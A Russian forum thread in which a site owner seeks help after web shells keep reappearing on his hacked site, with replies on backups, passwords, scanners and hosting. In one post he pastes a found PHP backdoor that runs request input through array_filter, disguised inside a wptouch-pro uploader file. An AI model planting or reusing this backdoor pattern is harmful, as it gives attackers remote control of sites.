Дыра в сайте 2

#1 11 октября 2014 в 22:47
Всем привет !
Прошу специалистов подсказать, как обнаружить и закрыть дыры в сайте .
Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php
Шаблон Adattive, v1.10.3
#2 12 октября 2014 в 01:05
Самое простое — это восстановить бэкап. А вообще надо смотреть где у вас сидит web shell, через который и заливают эти файлы.
Ну и раз сломали уже, значит надо пароли от доступа к хостингу поменять (ftp, ssh), а то можно ждать повторения.
#3 12 октября 2014 в 01:53
Уважаемый Rich, а как вы их заметили? и подумайте может где то переходили по ссылке или у вас единый был пароль с другими сайтами.
А так Уважаемый airy, говорит все правильно и верно. надо тоже проверить у себя AI-Bolitом сайт на всякий случай!
#4 12 октября 2014 в 10:24
Заметил хостер, предупреждает уже третий раз(… они сказали смотреть в скриптах, в каких именно не уточнили.
Насколько я понял, было перенаправление на какую то страницу, при просмотре сайта на мобильных устройствах.
Также с сайта идет рассылка каких то писем, я как то порылся в одной из найденных залитых, чужих страниц… нашел в оконцовке сайт куда идет перенаправление — на сайт каких то курсов в Москве..
Пока поменяю пароли… ума не приложу, как закрыть доступ.
#5 12 октября 2014 в 10:53
сегодня нашел файл — custom_icons2.php в корне сайта
  1. ;
  2. $p = array($_REQUEST['x']);
  3. $pf = array_filter($p, $f);exit;
  4. ?>
  5. <div class="custom-icon-uploader" id="custom_icon_uploader">
  6. <span class="spinner" style="display:none"></span>
  7. <button class="upload button-secondary" id="custom_icon_upload_button"><?php _e( 'Upload Icon', 'wptouch-pro' ); ?></button>
  8. <div class="progress progress-striped progress-success" style="display: none;" title="<?php _e( 'Upload Complete!', 'wptouch-pro' ); ?>" rel="popover" data-placement="right">
  9. <div class="bar" style="width: 20%;"></div>
  10. </div>
  11.  
  12. <br class="clearfix" />
  13. <span class="upload-desc"><?php _e( 'Ready to upload', 'wptouch-pro' ); ?>&hellip;</span>
  14. <div id="custom_icon_uploader_spot" style="display: none;"></div>
  15. </div>
и файл inc.php

Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст
где и как можно узнать, каким образом они туда попали?
#6 12 октября 2014 в 11:52
Нашел в аналитике webalizerftp какого то пользователя для ftp, примечательно то, что я не создавал такого пользователя и нигде больше он не виден… где он мог прописаться?
#7 12 октября 2014 в 15:47
может хостера взломали, а они не хотят признавать, что они не успели вовремя убрать уязвимости в BASH (Shellshock)
#8 12 октября 2014 в 16:19
Александр, вы плохо понимаете суть данной уязвимости, иначе бы не выдвинули такое предположение.
#9 12 октября 2014 в 18:27


Александр, вы плохо понимаете суть данной уязвимости, иначе бы не выдвинули такое предположение.

stealthdebuger
Уважаемый stealthdebuger
все возможно, ну сами подумайте если получить полный доступ к серверу на котором хранятся сайты, или хостер использует старое ПО в котором есть лазейки и возможно просмотра не только своего сайта, а и других каким то образом, то можно внедрять свой зловредный код в другие детища. Я просто стараюсь рассмотреть все возможные явления в данной ситуации. Плюс если уязвимость дает большие возможности и получить полный контроль над машиной(выполняя любые команды), почему вы считаете, что такая вроде бы абсурдная идея не имеет право на существование?
#10 12 октября 2014 в 18:29
P.S. по мне лучше еще посмотреть репутацию данной компании и отзывы других о их услугах. (выбирая самых достойных и проверенных).
#11 12 октября 2014 в 23:27
Александр, согласен… серверный антивирь нашел 4 шелла, причем заражены были и пара других сайтов.
#12 13 октября 2014 в 00:37
ну вот, я просто стараюсь, ничего личного))) laugh

я советую вам чаще делать бекапы, желательно отдельные еще потом периодически раз в неделю или хотя бы месяц, почистить сайт от шелов и т.д.
подыскать достойного хостера для своего сайтика и не забывать главное про безопасность на своём компьютере — поставить хотя бы тот же NOD32 от комании ESET(версию Endpoint Security 5.0.2229.1, она лучше корпоративная и firewall есть!)
Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст


а так еще проверьте AI-Bolit'ом скриптом выше в самом первом комментарии про него написал ^^

Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст
#13 13 октября 2014 в 16:22
Al-Bolit есть у меня, но чет я не особо ему доверял… так и не использовал его, надо поюзать… Стоит AVG врде суровый антивирь)
Бекапы серверными средствами делаю.
#14 13 октября 2014 в 16:52
Про бекап

кто какие использует срипты(вещи) для бекапа базы данных, ну кроме phpmyadmin? Я например очень люблю Sypex Dumper 2

Александр
Так если всю базу целиком, и если есть доступ к ssh, то удобней и быстрее так:
  1.  
  2. mysqldump -uUser -p database > database.sql
  3. mysql -uUser -p database < database.sql
  4.  
P.S. Ниасилил я как спойлер вставлять, прошу прощения.
#15 19 октября 2014 в 20:53

Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php

Rich

Капец, эти файлы после удаления опять появились, что делать ???
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.